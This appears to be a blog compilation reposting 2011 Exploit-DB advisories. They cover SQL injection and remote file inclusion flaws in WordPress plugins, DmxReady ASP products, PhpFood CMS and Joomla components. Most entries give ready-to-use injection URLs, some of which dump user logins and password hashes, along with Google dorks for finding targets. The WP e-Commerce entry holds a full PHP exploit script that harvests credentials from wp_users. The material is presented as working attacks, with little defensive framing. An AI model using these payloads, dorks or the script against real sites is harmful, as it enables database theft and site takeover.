WordPress jetpack plugin SQL Injection Vulnerability

Standard

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in  jetpack, WordPress Plugin,
vulnerability is SQL injection.
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

 

Fonte: http://www.exploit-db.com/exploits/18126/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

Standard


# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)


PoC

http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)


Vulnerable Code

if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

WordPress PureHTML plugin

Standard


# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

WordPress yolink Search plugin

Standard


# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/

WordPress wp audio gallery playlist plugin

Standard


# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix . "posts";
...
if (isset($_GET['post_gallery']))
$query = 'SELECT * FROM `'.$table_name.'` WHERE `post_parent` = ''.$_GET['post_gallery'].'' AND `post_mime_type` = 'audio/mpeg' ORDER BY `menu_order` ASC';

Fonte: http://www.exploit-db.com/exploits/17756/

WordPress Crawl Rate Tracker plugin

Standard


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` < = '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

WordPress Event Registration plugin

Standard


# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

Fonte: http://www.exploit-db.com/exploits/17751/

WordPress Contus HD FLV Player plugin

Standard


# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1

---------------
Vulnerable code
---------------
$pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) :
mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;

Fonte: http://www.exploit-db.com/exploits/17678/

WordPress File Groups plugin

Standard


# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");

http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin

Standard


# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/ $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini
For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff.
It will show user_login and user_pass of wp_users table;

Google Dork: inurl:page_id= "Your billing/contact details"
Follow us on Twitter! @IHTeam
*/
function help() {
echo "n";
echo " -------------------WP e-Commerce < = 3.8.4 SQL Injection---------------nn"; echo " How to use: php wp-ecommerce.php host path page_id [table_name]nn"; echo " host = Domain namen"; echo " path = Path of WordPressn"; echo " page_id = Int value of the login page of WP e-commercen"; echo " table_name = Default is wp_usersnn"; echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_usersnn"; echo " ----------------------------------------------------------------------nn"; } function exploit($host,$path,$pageid,$table) { $url = $host.$path."?page_id=".$pageid."&edit_profile=true"; $buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE '1'='1"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true"); $result= curl_exec ($ch); curl_close ($ch); echo "Now using table name: $table... "; preg_match("/(.*?)< /span>.
/", $result, $matches);
if ( !isset($matches[1]) )
$msg="Wrong table name or not vulnerablen";
else
$msg="Credential found: ".$matches[1]."n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
if (isset($argv[4]))
$table = $argv[4];
else
$table = "wp_users";

$host = $argv[1];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0))
$host="http://$host";

$path = $argv[2];
$pageid=(int)$argv[3];

/* Detecting the version, if possible */
$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) )
$version="Not detectablen";
else
$version=$vmatch[1];

echo "Version: ".$version."n";
/* End of version detecting */

/* Executing exploit */
preg_match('/[^.]+.[^.]+$/', $host, $hmatch);
$host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) {
echo exploit($host,$path,$pageid,$val);
}
/* End of exploit */
} else
help();

Fonte: http://www.exploit-db.com/exploits/17613/

phpDealerLocator Multiple SQL Injection Vulnerabilities

Standard

# Exploit Title: phpDealerLocator - Multiple SQL Injection vulnerabilities
# Date: 7/3/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: phpdealerlocator.yourphppro.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:

record.php?Dealer_ID=
record_country.php?Dealer_ID=
results_latlong.php?s_Latitude=
results_latlong.php?s_Longitude=
results_latlong.php?s_Dealer_Radius=
results_phone.php?s_Dealer_Radius=
results_radius.php?s_Dealer_Radius=

##############################################################
PoC:

http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--

##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew

Fonte: http://www.exploit-db.com/exploits/17477/

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

Standard

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_faqsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=faqs-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

———————————————————————————————————
Bug;

http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK]

DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Exploit Title:DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_contactusmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=contact-us-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK]

DMXReady Registration Manager v1.2 SQL Injection Vulneratbility

# Exploit Title: DMXReady Registration Manager v1.2 SQL Injection
Vulneratbility
# Google Dork: inurl:inc_registrationmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=registration-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/RegistrationManager/update.asp?MemberID=xx [ SQL

# Exploit Title: DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility
# Google Dork: inurl:inc_catalogmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=catalog-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————————————-
Bug details;

http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK]

DmxReady News Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady News Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_newsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=news-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-
Bug ;

http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK]

Fontes: http://www.exploit-db.com/exploits/17480/
http://www.exploit-db.com/exploits/17479/
http://www.exploit-db.com/exploits/17478/
http://www.exploit-db.com/exploits/17475/
http://www.exploit-db.com/exploits/17475/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_documentlibrarymanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=document-library-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=account-list-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
---------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17483/

PhpFood CMS v2.00 SQL Injection Vulnerability

Standard

#############################################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

[ See It ]

Duplicate entry '5.0.91-community1' for key 1 :D

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] Stop Dreaming , Lets Do it !
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Fonte: http://www.exploit-db.com/exploits/17485/

Joomla Component (com_team) SQL Injection Vulnerability

Standard

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

Fonte: http://www.exploit-db.com/exploits/17412/

WordPress Events Manager Extended Plugin SQL Injection Vulnerability

Standard

------------------------------------------------------------------------

# WordPress Events Manager Extended Plugin Persistent SQL Vulnerability
------------------------------------------------------------------------
# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/
# Version     : 3.1.2
# Author      : LoocK3D
# Date        : 11 June , 2011
------------------------------------------------------------------------
[-] Dork            ; inurl:wp-admin/admin.php?page=
[-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL]
[-] Exploit         ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+wp_users--
------------------------------------------------------------------------
# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew
# UAHCrew        : uahcrew@yahoo.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
# LoocK3D        : locked.ks@gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */

</script>

 

Fonte: http://www.exploit-db.com/exploits/17386/

Joomla Component com_joomnik SQL Injection Vulnerability

Standard

 

<------------------- header data start ------------------- >

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################

http://joomlacode.org/gf/project/joomnik/